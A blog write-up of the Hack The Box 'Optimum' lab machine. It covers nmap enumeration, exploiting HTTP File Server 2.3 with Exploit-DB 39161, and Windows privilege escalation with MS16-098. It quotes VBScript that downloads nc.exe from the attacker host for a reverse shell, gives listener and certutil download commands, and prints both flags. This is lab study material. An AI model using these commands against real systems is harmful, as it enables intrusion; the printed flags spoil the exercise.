[hackthebox] Optimum

optimum
This is a relative easy machine, as seen from the matrix the attacks are more related to CVE.

nmap enumeration

nmap -A -p- -T4 -oN optimum -vvv 10.10.10.8
optimum2

Http File Server 2.3

As shown in the web browser, the web service is hosted by http file server which is a program for windows to server files via http web service, this is easy to use and setup without too much effort on the user’s end.
optimum3

optimum4

httpfileserver 2.3 exploit

A search from the web reveals that httpfileserver 2.3 has a remote code execution exploit written in python.
https://www.exploit-db.com/exploits/39161

Reading the exploit code, it is obvious that the python is creating a vb script with the following source code:

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://"+ip_addr+"/nc.exe", False
xHttp.Send

with bStrm
    .type = 1 '//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\Users\Public\nc.exe", 2 '//overwrite
end with

The exploit code downloads nc.exe from the attacker’s machine then save it as nc.exe in C:\Users\Public. Then execute the script to trigger nc.exe to do a reverse tcp and create a cmd shell, the vulnerability of HFS 2.3 lies on its variable – search
See this:
optimum6

Get the user flag

I need to turn on a web server that hosts the nc.exe then on another terminal I need to create a nc server to listen on.
On the exploit code I change the ip address to my own tunnel ip address so that the exploit will do a connection back to my nc server.
Step 1:
python3 -m http.server 80
This command has to be executed in the directory that has the nc.exe.
optimum7

Step 2:
then start my nc server sudo nc -lvnp 443
optimum8

Step 3:
Modify the ip address within the exploit code, then run it.
optimum9

python 39161.py 10.10.10.8 80
optimum10
optimum11

The user flag is d0c39409d7b994a9a1389ebf38ef5f73

Get the root

I recommend take a look at https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

On doing systeminfo the machine is running Windows 2012 R2 standard edition build 9600, there are a few kernel exploits which are usable, I chose the kernel driver exploit MS16-098, this exploit though is related to Windows 8.1 works perfectly on Windows 2012 server as well.
I download the compiled binary bfill.exe then serve a web server for me to download from Optimum.
optimum13

optimum14

On the Optimum machine I do certutil -f -urlcache http://10.10.14.27/bfill.exe c:\users\kostas\downloads\bfill.exe
optimum15

The run the exploit to get root.
optimum16

optimum17

the root flag is 51ed1b36553c8461f4552c2e92b3eeed

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s